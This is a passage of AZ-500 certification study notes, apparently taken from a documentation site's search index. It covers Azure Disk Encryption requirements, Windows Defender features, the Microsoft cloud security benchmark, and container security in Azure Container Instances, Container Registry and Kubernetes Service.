        Group Policy requirements. - Azure Disk Encryption uses the BitLocker external key protector for Windows VMs. For domain joined VMs, don't push any group policies that enforce TPM protectors. BitLocker policy on domain joined virtual machines with custom group policy must include the following setting: Configure user storage of BitLocker recovery information -> Allow 256-bit recovery key. Azure Disk Encryption will fail when custom group policy settings for BitLocker are incompatible. On machines that didn't have the correct policy setting, apply the new policy, force the new policy to update (gpupdate.exe /force), and then restarting may be required. Azure Disk Encryption will fail if domain level group policy blocks the AES-CBC algorithm, which is used by BitLocker.

        Encryption key storage requirements. - Azure Disk Encryption requires an Azure Key Vault to control and manage disk encryption keys and secrets. Your key vault and VMs must reside in the same Azure region and subscription.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#linux","title":"LINUX","text":"

        Supported VMs. - \u00a0Azure Disk Encryption is supported on Generation 1 and Generation 2 VMs. Azure Disk Encryption is also available for VMs with premium storage.

        Note:\u00a0Azure Disk Encryption is not available on Basic, A-series VMs, or on virtual machines that do not meet these minimum memory requirements:

        Virtual machine Minimum memory requirement Linux VMs when only encrypting data volumes 2 GB Linux VMs when encrypting both data and OS volumes, and where the root (/) file system usage is 4GB or less 8 GB Linux VMs when encrypting both data and OS volumes, and where the root (/) file system usage is greater than 4GB The root file system usage * 2. For instance, a 16 GB of root file system usage requires at least 32GB of RAM

        Once the OS disk encryption process is complete on Linux virtual machines, the VM can be configured to run with less memory.

        Azure Disk Encryption requires the dm-crypt and\u00a0vfat\u00a0modules to be present on the system. Removing or disabling\u00a0vfat\u00a0from the default image will prevent the system from reading the key volume and obtaining the key needed to unlock the disks on subsequent reboots. System hardening steps that remove the vfat module from the system are not compatible with Azure Disk Encryption

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#38-managed-disk-encryption-options","title":"3.8. Managed disk encryption options","text":"

        There are several types of encryption available for your managed disks, including Azure Disk Encryption (ADE), Server-Side Encryption (SSE), and encryption at the host.

        Azure Disk Encryption helps protect and safeguard your data to meet organizational security and compliance commitments. ADE encrypts the OS and data disks of Azure virtual machines (VMs) inside your VMs by using the device mapper DM-Crypt feature of Linux or the BitLocker feature of Windows. Azure Disk Encryption (ADE) is integrated with Azure Key Vault to help you control and manage the disk encryption keys and secrets. Azure Disk Storage Server-Side Encryption (also referred to as encryption-at-rest or Azure Storage encryption) automatically encrypts data stored on Azure-managed disks (OS and data disks) when persisting on the Storage Clusters. When configured with a Disk Encryption Set (DES), it supports customer-managed keys as well. Encryption at the host ensures that data stored on the VM host hosting your VM is encrypted at rest and flows encrypted to the Storage clusters. Confidential disk encryption binds disk encryption keys to the virtual machine's TPM (Trusted Platform Module) and makes the protected disk content accessible only to the VM. The TPM and VM guest state is always encrypted in attested code using keys released by a secure protocol that bypasses the hypervisor and host operating system. Currently only available for the OS disk. Encryption at the host may be used for other disks on a Confidential VM in addition to Confidential Disk Encryption.

        For\u00a0Encryption at the host\u00a0and\u00a0Confidential disk encryption, Microsoft Defender for Cloud does not detect the encryption state. We are in the process of updating Microsoft Defender.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#39-windows-defender","title":"3.9. Windows Defender","text":"

        Windows 10, Windows Server 2019, and Windows Server 2016 include key security features. They are Windows Defender Credential Guard, Windows Defender Device Guard, and Windows Defender Application Control.

        • Windows Defender Credential Guard: Introduced in Windows 10 Enterprise and Windows Server 2016, Windows Defender Credential Guard uses virtualization-based security enhancement to isolate secrets so that only privileged system software can access them. Unauthorized access to these secrets might lead to credential theft attacks, such as Pass-the-Hash or pass-the-ticket attacks. Windows Defender Credential Guard helps prevent these attacks by helping protect Integrated Windows Authentication (NTLM) password hashes, Kerberos authentication ticket-granting tickets, and credentials that applications store as domain credentials.
        • Windows Defender Application Control: Windows Defender Application Control helps mitigate these types of threats by restricting the applications that users can run and the code that runs in the system core, or kernel. Policies in Windows Defender Application Control also block unsigned scripts and MSIs, and Windows PowerShell runs in Constrained language mode.
        • Windows Defender Device Guard: Does this mean the Windows Defender Device Guard configuration state is going away? Not at all. The term device guard will continue to describe the fully locked down state achieved using Windows Defender Application Control, HVCI, and hardware and firmware security features. It will also allow Microsoft to work with its original equipment manufacturer (OEM) partners to identify specifications for devices that are device guard capable\u2014so that joint customers can easily purchase devices that meet all the hardware and firmware requirements of the original locked down scenario of Windows Defender Device Guard for Windows 10 devices.

        Microsoft Defender for Endpoint - Supported Operating Systems

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#310-microsoft-cloud-security-benchmark-in-defender-for-cloud","title":"3.10. Microsoft cloud security benchmark in Defender for Cloud","text":"

        The\u00a0Microsoft cloud security benchmark (MCSB)\u00a0provides prescriptive best practices and recommendations to help\u00a0improve the security of workloads,\u00a0data, and\u00a0services\u00a0on\u00a0Azure\u00a0and your\u00a0multicloud environment. This benchmark focuses on\u00a0cloud-centric control areas\u00a0with input from a set of\u00a0holistic Microsoft\u00a0and\u00a0industry security guidance\u00a0that includes:

        • Cloud Adoption Framework: Guidance on\u00a0security, including\u00a0strategy,\u00a0roles\u00a0and\u00a0responsibilities,\u00a0Azure Top 10 Security Best Practices, and\u00a0reference implementation.
        • Azure Well-Architected Framework: Guidance on securing your workloads on Azure.
        • The Chief Information Security Officer (CISO) Workshop: Program guidance and reference strategies to accelerate security modernization using Zero Trust principles.
        • Other industry and cloud service provider's security best practice standards and framework: Examples include the Amazon Web Services (AWS) Well-Architected Framework, Center for Internet Security (CIS) Controls, National Institute of Standards and Technology (NIST), and Payment Card Industry Data Security Standard (PCI-DSS).

        The\u00a0Azure Security Benchmark (ASB)\u00a0at \u00a0Microsoft cloud security benchmark (MCSB) helps you quickly work with different clouds by:

        • Providing a single control framework to easily meet the security controls across clouds
        • Providing consistent user experience for monitoring and enforcing the multicloud security benchmark in Defender for Cloud
        • Staying aligned with Industry Standards (e.g., Center for Internet Security, National Institute of Standards and Technology, Payment Card Industry)

        Automated control monitoring for AWS in Microsoft Defender for Cloud:\u00a0You can use\u00a0Microsoft Defender for Cloud Regulatory Compliance Dashboard\u00a0to monitor your AWS environment against\u00a0Microsoft cloud security benchmark (MCSB), just like how you monitor your Azure environment. We developed approximately\u00a0180 AWS checks\u00a0for the new AWS security guidance in MCSB, allowing you to monitor your AWS environment and resources in Microsoft Defender for Cloud.

        Some controls:

        Control Domains Description Network security (NS) Network Security\u00a0covers controls to secure and protect networks, including securing virtual networks, establishing private connections, preventing and mitigating external attacks, and securing Domain Name System (DNS). Identity Management (IM) Identity Management\u00a0covers controls to establish a secure identity and access controls using identity and access management systems, including the use of single sign-on, strong authentications, managed identities (and service principals) for applications, conditional access, and account anomalies monitoring. Privileged Access (PA) Privileged Access\u00a0covers controls to protect privileged access to your tenant and resources, including a range of controls to protect your administrative model, administrative accounts, and privileged access workstations against deliberate and inadvertent risk. Data Protection (DP) Data Protection\u00a0covers control of data protection at rest, in transit, and via authorized access mechanisms, including discover, classify, protect, and monitoring sensitive data assets using access control, encryption, key management, and certificate management. Asset Management (AM) Asset Management\u00a0covers controls to ensure security visibility and governance over your resources, including recommendations on permissions for security personnel, security access to asset inventory and managing approvals for services and resources (inventory,\u00a0track, and\u00a0correct). Logging and Threat Detection (LT) Logging and Threat Detection\u00a0covers controls for detecting threats on the cloud and enabling, collecting, and storing audit logs for cloud services, including enabling detection, investigation, and remediation processes with controls to generate high-quality alerts with native threat detection in cloud services; it also includes collecting logs with a cloud monitoring service, centralizing security analysis with a\u00a0security event management (SEM), time synchronization, and log retention. Incident Response (IR) Incident Response\u00a0covers controls in the incident response life cycle - preparation, detection and analysis, containment, and post-incident activities, including using Azure services (such as Microsoft Defender for Cloud and Sentinel) and/or other cloud services to automate the incident response process. Posture and Vulnerability Management (PV) Posture and Vulnerability Management\u00a0focuses on controls for assessing and improving the cloud security posture, including vulnerability scanning, penetration testing, and remediation, as well as security configuration tracking, reporting, and correction in cloud resources. Endpoint Security (ES) Endpoint Security\u00a0covers controls in endpoint detection and response, including the use of endpoint detection and response (EDR) and anti-malware service for endpoints in cloud environments. Backup and Recovery (BR) Backup and Recovery\u00a0covers controls to ensure that data and configuration backups at the different service tiers are performed, validated, and protected. DevOps Security (DS) DevOps Security\u00a0covers the controls related to the security engineering and operations in the DevOps processes, including deployment of critical security checks (such as static application security testing and vulnerability management) prior to the deployment phase to ensure the security throughout the DevOps process; it also includes common topics such as threat modeling and software supply security. Governance and Strategy (GS) Governance and Strategy\u00a0provides guidance for ensuring a coherent security strategy and documented governance approach to guide and sustain security assurance, including establishing roles and responsibilities for the different cloud security functions, unified technical strategy, and supporting policies and standards.","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#311-microsoft-defender-for-cloud-recommendations","title":"3.11. Microsoft Defender for Cloud recommendations","text":"

        Using the\u00a0policies, Defender for Cloud periodically analyzes the compliance status of your resources to identify potential security misconfigurations and weaknesses. It then provides you with recommendations on how to remediate those issues. Recommendations result from assessing your resources against the relevant policies and identifying resources that aren't meeting your defined requirements.

        Defender for Cloud\u00a0makes its security recommendations based on your chosen initiatives. When a policy from your initiative is compared against your resources and finds one or more that aren't compliant, it is presented as a recommendation in Defender for Cloud.

        Recommendations\u00a0are actions for you to take to secure and harden your resources. In practice, it works like this:

        1. Azure Security Benchmark is an\u00a0initiative\u00a0that contains requirements. For example, Azure Storage accounts must restrict network access to reduce their attack surface.

        2. The initiative includes multiple\u00a0policies, each requiring a specific resource type. These policies enforce the requirements in the initiative. To continue the example, the storage requirement is enforced with the policy \"Storage accounts should restrict network access using virtual network rules.\"

        3. Microsoft Defender for Cloud continually assesses your connected subscriptions. If it finds a resource that doesn't satisfy a policy, it displays a\u00a0recommendation\u00a0to fix that situation and harden the security of resources that aren't meeting your security requirements. For example, if an Azure Storage account on your protected subscriptions isn't protected with virtual network rules, you'll see the recommendation to harden those resources.

        So, (1)\u00a0an initiative includes\u00a0(2)\u00a0policies that generate\u00a0(3)\u00a0environment-specific recommendations.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#4-containers-security","title":"4. Containers security","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#41-containers","title":"4.1. Containers","text":"

        A container is an isolated, lightweight silo for running an application on the host operating system. Containers build on top of the host operating system's kernel (which can be thought of as the buried plumbing of the operating system), and contain only apps and some lightweight operating system APIs and services that run in user mode. While a container shares the host operating system's kernel, the container doesn't get unfettered access to it. Instead, the container gets an isolated\u2013and in some cases virtualized\u2013view of the system. For example, a container can access a virtualized version of the file system and registry, but any changes affect only the container and are discarded when it stops. To save data, the container can mount persistent storage such as an Azure Disk or a file share (including Azure Files).

        You need\u00a0Docker\u00a0in order to work with Windows Containers. Docker consists of the Docker Engine (dockerd.exe), and the Docker client (docker.exe).

        How it works.- A container builds on top of the kernel, but the kernel doesn't provide all of the APIs and services an app needs to run\u2013most of these are provided by system files (libraries) that run above the kernel in user mode. Because a container is isolated from the host's user mode environment, the container needs its own copy of these user mode system files, which are packaged into something known as a base image. The base image serves as the foundational layer upon which your container is built, providing it with operating system services not provided by the kernel.

        Because containers require far fewer resources (for example, they don't need a full OS), they're easy to deploy and they start fast. This allows you to have higher density, meaning that it allows you to run more services on the same hardware unit, thereby reducing costs. As a side effect of running on the same kernel, you get less isolation than VMs.

        Features

        Isolation. - Typically provides lightweight isolation from the host and other containers, but doesn't provide as strong a security boundary as a VM. (You can increase the security by using Hyper-V isolation mode to isolate each container in a lightweight VM).

        Operating System. - Runs the user mode portion of an operating system, and can be tailored to contain just the needed services for your app, using fewer system resources.

        Deployment. - Deploy individual containers by using Docker via command line; deploy multiple containers by using an orchestrator such as Azure Kubernetes Service.

        Persistent storage. - Use Azure Disks for local storage for a single node, or Azure Files (SMB shares) for storage shared by multiple nodes or servers.

        Fault tolerance. - If a cluster node fails, any containers running on it are rapidly recreated by the orchestrator on another cluster node.

        Networking. - Uses an isolated view of a virtual network adapter, providing a little less virtualization\u2013the host's firewall is shared with containers\u2013while using less resources.

        In Docker, each layer is the resulting set of changes that happen to the filesystem after executing a command, such as, installing a program. So, when you view the filesystem after the layer has been copied, you can view all the files, including the layer when the program was installed. You can think of an image as an auxiliary read-only hard disk ready to be installed in a \"computer\" where the operating system is already installed. Similarly, you can think of a container as the \"computer\" with the image hard disk installed. The container, just like a computer, can be powered on or off.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#42-azure-container-instances-aci-security","title":"4.2. Azure Container Instances (ACI) security","text":"

        There are many security recommendations for Azure Container Instances, use these to optimize your security for containers.

        Use a private registry: Containers are built from images that are stored in one or more repositories. These repositories can belong to a public registry, like Docker Hub, or to a private registry. An example of a private registry is the Docker Trusted Registry, which can be installed on-premises or in a virtual private cloud. You can also use cloud-based private container registry services, including Azure Container Registry. A publicly available container image does not guarantee security. Container images consist of multiple software layers, and each software layer might have vulnerabilities. To help reduce the threat of attacks, you should store and retrieve images from a private registry, such as Azure Container Registry or Docker Trusted Registry. In addition to providing a managed private registry, Azure Container Registry supports service principal-based authentication through Microsoft Entra ID for basic authentication flows. This authentication includes role-based access for read-only (pull), write (push), and other permissions.

        Monitor and scan container images continuously: Take advantage of solutions to scan container images in a private registry and identify potential vulnerabilities. It\u2019s important to understand the depth of threat detection that the different solutions provide. For example, Azure Container Registry optionally integrates with Microsoft Defender for Cloud to automatically scan all Linux images pushed to a registry. Microsoft Defender for Cloud integrated Qualys scanner detects image vulnerabilities, classifies them, and provides remediation guidance.

        Protect credentials: Containers can spread across several clusters and Azure regions. So, you must secure credentials required for logins or API access, such as passwords or tokens. Ensure that only privileged users can access those containers in transit and at rest. Inventory all credential secrets, and then require developers to use emerging secrets-management tools that are designed for container platforms. Make sure that your solution includes encrypted databases, TLS encryption for secrets data in transit, and least-privilege role-based access control. Azure Key Vault is a cloud service that safeguards encryption keys and secrets (such as certificates, connection strings, and passwords) for containerized applications. Because this data is sensitive and business critical, secure access to your key vaults so that only authorized applications and users can access them.

        Use vulnerability management as part of your container development lifecycle: By using effective vulnerability management throughout the container development lifecycle, you improve the odds that you identify and resolve security concerns before they become a more serious problem.

        Scan for vulnerabilities: New vulnerabilities are discovered all the time, so scanning for and identifying vulnerabilities is a continuous process. Incorporate vulnerability scanning throughout the container lifecycle:

        Ensure that only approved images are used in your environment: There\u2019s enough change and volatility in a container ecosystem without allowing unknown containers as well. Allow only approved container images. Have tools and processes in place to monitor for and prevent the use of unapproved container images. An effective way of reducing the attack surface and preventing developers from making critical security mistakes is to control the flow of container images into your development environment. Image signing or fingerprinting can provide a chain of custody that enables you to verify the integrity of the containers. For example, Azure Container Registry supports Docker's content trust model, which allows image publishers to sign images that are pushed to a registry, and image consumers to pull only signed images.

        Enforce least privileges in runtime: The concept of least privileges is a basic security best practice that also applies to containers. When a vulnerability is exploited, it generally gives the attacker access and privileges equal to those of the compromised application or process. Ensuring that containers operate with the lowest privileges and access required to get the job done reduces your exposure to risk.

        Reduce the container attack surface by removing unneeded privileges: You can also minimize the potential attack surface by removing any unused or unnecessary processes or privileges from the container runtime. Privileged containers run as root. If a malicious user or workload escapes in a privileged container, the container will then run as root on that system.

        Log all container administrative user access for auditing: Maintain an accurate audit trail of administrative access to your container ecosystem, including your Kubernetes cluster, container registry, and container images. These logs might be necessary for auditing purposes and will be useful as forensic evidence after any security incident. Azure solutions include:

        • Integration of Azure Kubernetes Service with Microsoft Defender for Cloud to monitor the security configuration of the cluster environment and generate security recommendations
        • Azure Container Monitoring solution
        • Resource logs for Azure Container Instances and Azure Container Registry

        Container access

        • Azure Container Instances enables exposing your container groups directly to the internet with an IP address and a fully qualified domain name (FQDN). When you create a container instance, you can specify a custom DNS name label so your application is reachable at customlabel.azureregion.azurecontainer.io.
        • Azure Container Instances also supports executing a command in a running container by providing an interactive shell to help with application development and troubleshooting. Access takes places over HTTPS, using TLS to secure client connections.

        Container deployment: Deploy containers from DockerHub or Azure Container Registry.

        Hypervisor-level security:\u00a0Historically, containers have offered application dependency isolation and resource governance but have not been considered sufficiently hardened for hostile multi-tenant usage. Azure Container Instances guarantees your application is as isolated in a container as it would be in a VM.

        Custom sizes:\u00a0Containers are typically optimized to run just a single application, but the exact needs of those applications can differ greatly. Azure Container Instances provides optimum utilization by allowing exact specifications of CPU cores and memory. You pay based on what you need and get billed by the second, so you can fine-tune your spending based on actual need.

        Persistent storage: To retrieve and persist state with Azure Container Instances, we offer direct mounting of Azure Files shares backed by Azure Storage.

        Flexible billing: Supports per-GB, per-CPU, and per-second billing.

        Linux and Windows containers: \u00a0Azure Container Instances can schedule both Windows and Linux containers with the same API. Simply specify the OS type when you create your container groups. For Windows container deployments, use images based on common Windows base images. Some features are currently restricted to Linux containers:

        • Multiple containers per container group
        • Volume mounting (Azure Files, emptyDir, GitRepo, secret)
        • Resource usage metrics with Azure Monitor
        • Virtual network deployment
        • GPU resources (preview)

        Co-scheduled groups: Azure Container Instances supports scheduling of multi-container groups that share a host machine, local network, storage, and lifecycle. This enables you to combine your main application container with other supporting role containers, such as logging sidecars.

        Virtual network deployment: \u00a0Currently available for production workloads in a subset of Azure regions, this feature of Azure Container Instances enables deployment of container instances into an Azure virtual network. By deploying container instances into a subnet within your virtual network, they can communicate securely with other resources in the virtual network, including those that are on premises (through VPN gateway or ExpressRoute).

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#43-azure-container-registry-acr","title":"4.3. Azure Container Registry (ACR)","text":"

        A container registry is a service that stores and distributes container images. Docker Hub is a public container registry that supports the open source community and serves as a general catalog of images. Azure Container Registry provides users with direct control of their images, with integrated authentication, geo-replication supporting global distribution and reliability for network-close deployments, virtual network and firewall configuration, tag locking, and many other enhanced features.

        In addition to Docker container images, Azure Container Registry supports related content artifacts including Open Container Initiative (OCI) image formats.

        You log in to a registry using the Azure CLI or the standard docker login command. Azure Container Registry transfers container images over HTTPS, and supports TLS to secure client connections. Azure Container Registry requires all secure connections from servers and applications to use TLS 1.2. Enable TLS 1.2 by using any recent docker client (version 18.03.0 or later). You control access to a container registry using an Azure identity, a Microsoft Entra ID-backed service principal, or a provided admin account. Use role-based access control (RBAC) to assign users or systems fine-grained permissions to a registry.

        Container registries manage repositories, collections of container images or other artifacts with the same name, but different tags. For example, the following three images are in the \"acr-helloworld\" repository:

        • acr-helloworld:latest
        • acr-helloworld:v1
        • acr-helloworld:v2

        A container image or other artifact within a registry is associated with one or more tags, has one or more layers, and is identified by a manifest. Understanding how these components relate to each other can help you manage your registry effectively.

        As with any IT environment, you should consistently monitor activity and user access to your container ecosystem to quickly identify any suspicious or malicious activity. The container monitoring solution in Log Analytics can help you view and manage your Docker and Windows container hosts in a single location.

        By using Log Analytics, you can:

        • View detailed audit information that shows commands used with containers.
        • Troubleshoot containers by viewing and searching centralized logs without having to remotely view Docker or Windows hosts.
        • Find containers that may be noisy and consuming excess resources on a host.
        • View centralized CPU, memory, storage, and network usage and performance information for containers.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#44-azure-container-registry-authentication","title":"4.4. Azure Container Registry authentication","text":"

        Individual login with Microsoft Entra ID.- When working with your registry directly, such as pulling images to and pushing images from a development workstation, authenticate by using the az acr login command in the Azure CLI. When you log in with az acr login, the CLI uses the token created when you executed az login to seamlessly authenticate your session with your registry. To complete the authentication flow, Docker must be installed and running in your environment. az acr login uses the Docker client to set a Microsoft Entra token in the docker.config file. Once you've logged in this way, your credentials are cached, and subsequent docker commands in your session do not require a username or password.

        Service Principal.- If you assign a service principal to your registry, your application or service can use it for headless authentication. Service principals allow role-based access to a registry, and you can assign multiple service principals to a registry. Multiple service principals allow you to define different access for different applications. The available roles for a container registry include:

        • AcrPull: pull
        • AcrPush: pull and push
        • Owner: pull, push, and assign roles to other users

        Admin account.- Each container registry includes an admin user account, which is disabled by default. You can enable the admin user and manage its credentials in the Azure portal, or by using the Azure CLI or other Azure tools. The admin account is provided with two passwords, both of which can be regenerated. Two passwords allow you to maintain connection to the registry by using one password while you regenerate the other. If the admin account is enabled, you can pass the username and either password to the docker login command when prompted for basic authentication to the registry.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#45-azure-kubernetes-service-aks","title":"4.5. Azure Kubernetes Service (AKS)","text":"

        As application development moves towards a container-based approach, the need to orchestrate and manage resources is important. Kubernetes is the leading platform that provides the ability to provide reliable scheduling of fault-tolerant application workloads. Azure Kubernetes Service (AKS) is a managed Kubernetes offering that further simplifies container-based application deployment and management.

        Azure Kubernetes Service (AKS) provides a managed Kubernetes service that reduces the complexity for deployment and core management tasks, including coordinating upgrades. The AKS control plane is managed by the Azure platform, and you only pay for the AKS nodes that run your applications. AKS is built on top of the open-source Azure Kubernetes Service Engine (aks-engine).

        Kubernetes cluster architecture: A Kubernetes cluster is divided into two components:

        • Control plane\u00a0nodes provide the core Kubernetes services and orchestration of application workloads.
        • Nodes\u00a0run your application workloads.

        Features of Azure Kubernetes Service:

        • Fully managed
        • Public IP and FQDN (Private IP option)
        • Accessed with RBAC or Microsoft Entra ID
        • Deployment of containers
        • Dynamic scale containers
        • Automation of rolling updates and rollbacks of containers
        • Management of storage, network traffic, and sensitive information

        Kubernetes cluster architecture is a set of design recommendations for deploying your containers in a secure and managed configuration. When you create an AKS cluster, a cluster master is automatically created and configured. This cluster master is provided as a managed Azure resource abstracted from the user. There is no cost for the cluster master, only the nodes that are part of the AKS cluster. The cluster master includes the following core Kubernetes components:

        • kube-apiserver\u00a0- The API server is how the underlying Kubernetes APIs are exposed. This component provides the interaction for management tools, such as\u00a0kubectl\u00a0or the Kubernetes dashboard. By default, the Kubernetes API server uses a public IP address and a fully qualified domain name (FQDN). You can control access to the API server using Kubernetes role-based access controls and Microsoft Entra ID.
        • etcd\u00a0- To maintain the state of your Kubernetes cluster and configuration, the highly available\u00a0etcd\u00a0is a key value store within Kubernetes.
        • kube-scheduler\u00a0- When you create or scale applications, the Scheduler determines what nodes can run the workload and starts them.
        • kube-controller-manager\u00a0- The Controller Manager oversees a number of smaller Controllers that perform actions such as replicating pods and handling node operations.

        AKS provides a single-tenant cluster master, with a dedicated API server, Scheduler, etc. You define the number and size of the nodes, and the Azure platform configures the secure communication between the cluster master and nodes. Interaction with the cluster master occurs through Kubernetes APIs, such as\u00a0kubectl\u00a0or the Kubernetes dashboard.

        This managed cluster master means that you do not need to configure components like a highly available store, but it also means that you cannot access the cluster master directly. Upgrades to Kubernetes are orchestrated through the Azure CLI or Azure portal, which upgrades the cluster master and then the nodes. To troubleshoot possible issues, you can review the cluster master logs through Azure Log Analytics.

        If you need to configure the cluster master in a particular way or need direct access to them, you can deploy your own Kubernetes cluster using\u00a0aks-engine.

        Nodes and node pools: To run your applications and supporting services, you need a Kubernetes node. An AKS cluster has one or more nodes, which is an Azure virtual machine (VM) that runs the Kubernetes node components and container runtime:

        • The kubelet is the Kubernetes agent that processes the orchestration requests from the control plane and scheduling of running the requested containers.
        • Virtual networking is handled by the kube-proxy on each node. The proxy routes network traffic and manages IP addressing for services and pods.
        • The\u00a0container runtime\u00a0is the component that allows containerized applications to run and interact with additional resources such as the virtual network and storage. In AKS, Moby is used as the container runtime.

        The Azure VM size for your nodes defines how many CPUs, how much memory, and the size and type of storage available (such as high-performance SSD or regular HDD). If you anticipate a need for applications that require large amounts of CPU and memory or high-performance storage, plan the node size accordingly. You can also scale out the number of nodes in your AKS cluster to meet demand.

        In AKS, the VM image for the nodes in your cluster is currently based on Ubuntu Linux or Windows Server 2019. When you create an AKS cluster or scale out the number of nodes, the Azure platform creates the requested number of VMs and configures them. There's no manual configuration for you to perform. Agent nodes are billed as standard virtual machines, so any discounts you have on the VM size you're using (including Azure reservations) are automatically applied. If you need to use a different host OS, container runtime, or include custom packages, you can deploy your own Kubernetes cluster using aks-engine. The upstream aks-engine releases features and provides configuration options before they are officially supported in AKS clusters. For example, if you wish to use a container runtime other than Moby, you can use aks-engine to configure and deploy a Kubernetes cluster that meets your current needs.

        Some basic concepts

        • Pools: Group of nodes with identical configuration.
        • Node: Individual VM running containerized applications.
        • Pods: Single instance of an application. A pod can contain multiple containers.
        • Deployment: One or more identical pods managed by Kubernetes.
        • Manifest: YAML file describing a deployment.

        AKS nodes are Azure virtual machines that you manage and maintain. Linux nodes run an optimized Ubuntu distribution using the Moby container runtime. Windows Server nodes run an optimized Windows Server 2019 release and also use the Moby container runtime. When an AKS cluster is created or scaled up, the nodes are automatically deployed with the latest OS security updates and configurations.

        • Linux: The Azure platform automatically applies OS security patches to Linux nodes on a nightly basis. If a Linux OS security update requires a host reboot, that reboot is not automatically performed. You can manually reboot the Linux nodes, or a common approach is to use Kured, an open-source reboot daemon for Kubernetes. Kured runs as a DaemonSet and monitors each node for the presence of a file indicating that a reboot is required. Reboots are managed across the cluster using the same cordon and drain process as a cluster upgrade.
        • Windows: Windows Update does not automatically run and apply the latest updates. On a regular schedule around the Windows Update release cycle and your own validation process, you should perform an upgrade on the Windows Server node pool(s) in your AKS cluster. This upgrade process creates nodes that run the latest Windows Server image and patches, then removes the older nodes. Nodes are deployed into a private virtual network subnet, with no public IP addresses assigned. For troubleshooting and management purposes, SSH is enabled by default. This SSH access is only available using the internal IP address.

        To provide storage, the nodes use Azure Managed Disks. For most VM node sizes, these are Premium disks backed by high-performance SSDs. The data stored on managed disks is automatically encrypted at rest within the Azure platform. To improve redundancy, these disks are also securely replicated within the Azure datacenter.

        Kubernetes environments, in AKS or elsewhere, currently aren't completely safe for hostile multi-tenant usage. Additional security features such as Pod Security Policies or more fine-grained role-based access controls (RBAC) for nodes make exploits more difficult. However, for true security when running hostile multi-tenant workloads, a hypervisor is the only level of security that you should trust. The security domain for Kubernetes becomes the entire cluster, not an individual node. For these types of hostile multi-tenant workloads, you should use physically isolated clusters.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#46-azure-kubernetes-service-networking","title":"4.6. Azure Kubernetes Service networking","text":"

        To allow access to your applications, or for application components to communicate with each other, Kubernetes provides an abstraction layer to virtual networking. Kubernetes nodes are connected to a virtual network, and can provide inbound and outbound connectivity for pods. The kube-proxy component runs on each node to provide these network features.

        In Kubernetes, Services logically group pods to allow for direct access via an IP address or DNS name and on a specific port. You can also distribute traffic using a load balancer. More complex routing of application traffic can also be achieved with Ingress Controllers. Security and filtering of the network traffic for pods is possible with Kubernetes network policies.

        The Azure platform also helps to simplify virtual networking for AKS clusters. When you create a Kubernetes load balancer, the underlying Azure load balancer resource is created and configured. As you open network ports to pods, the corresponding Azure network security group rules are configured. For HTTP application routing, Azure can also configure external DNS as new ingress routes are configured. In sum up:

        • Cluster IP\u00a0- Creates an internal IP address for use within the AKS cluster. Good for internal-only applications that support other workloads within the cluster.
        • NodePort\u00a0- Creates a port mapping on the underlying node that allows the application to be accessed directly with the node IP address and port.
        • LoadBalancer\u00a0- Creates an Azure load balancer resource, configures an external IP address, and connects the requested pods to the load balancer backend pool. To allow customers' traffic to reach the application, load balancing rules are created on the desired ports.
        • ExternalName\u00a0- Creates a specific DNS entry for easier application access.

        The\u00a0Network Policy\u00a0feature in Kubernetes lets you define rules for ingress and egress traffic between pods in a cluster.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#47-azure-kubernetes-service-storage","title":"4.7. Azure Kubernetes Service storage","text":"

        Applications that run in Azure Kubernetes Service (AKS) may need to store and retrieve data.

        A volume represents a way to store, retrieve, and persist data across pods and through the application lifecycle. Traditional volumes to store and retrieve data are created as Kubernetes resources backed by Azure Storage. You can manually create these data volumes to be assigned to pods directly, or have Kubernetes automatically create them. These data volumes can use Azure Disks or Azure Files:

        • Azure Disks\u00a0can be used to create a Kubernetes DataDisk resource. Disks can use Azure Premium storage, backed by high-performance SSDs, or Azure Standard storage, backed by regular HDDs. For most production and development workloads, use Premium storage. Azure Disks are mounted as ReadWriteOnce, so are only available to a single pod. For storage volumes that can be accessed by multiple pods simultaneously, use Azure Files.
        • Azure Files\u00a0can be used to mount an SMB 3.0 share backed by an Azure Storage account to pods. Files let you share data across multiple nodes and pods. Files can use Azure Standard storage backed by regular HDDs, or Azure Premium storage, backed by high-performance SSDs.

        Volumes that are defined and created as part of the pod lifecycle only exist until the pod is deleted. Pods often expect their storage to remain if a pod is rescheduled on a different host during a maintenance event, especially in StatefulSets. A persistent volume (PV) is a storage resource created and managed by the Kubernetes API that can exist beyond the lifetime of an individual pod.

        A\u00a0Persistent Volume\u00a0can be\u00a0statically\u00a0created by a cluster administrator, or\u00a0dynamically\u00a0created by the Kubernetes API server. If a pod is scheduled and requests storage that is not currently available, Kubernetes can create the underlying Azure Disk or Files storage and attach it to the pod. Dynamic provisioning uses a\u00a0StorageClass\u00a0to identify what type of Azure storage needs to be created

        To define different tiers of storage, such as Premium and Standard, you can create a Storage Class. The StorageClass also defines the reclaimPolicy. This reclaimPolicy controls the behavior of the underlying Azure storage resource when the pod is deleted and the persistent volume may no longer be required. The underlying storage resource can be deleted, or retained for use with a future pod. In AKS, two initial StorageClasses are created:

        • default\u00a0- Uses Azure Standard storage to create a Managed Disk. The reclaim policy indicates that the underlying Azure Disk is deleted when the persistent volume that used it is deleted.
        • managed-premium\u00a0- Uses Azure Premium storage to create Managed Disk. The reclaim policy again indicates that the underlying Azure Disk is deleted when the persistent volume that used it is deleted.

        If no StorageClass is specified for a persistent volume, the default StorageClass is used.

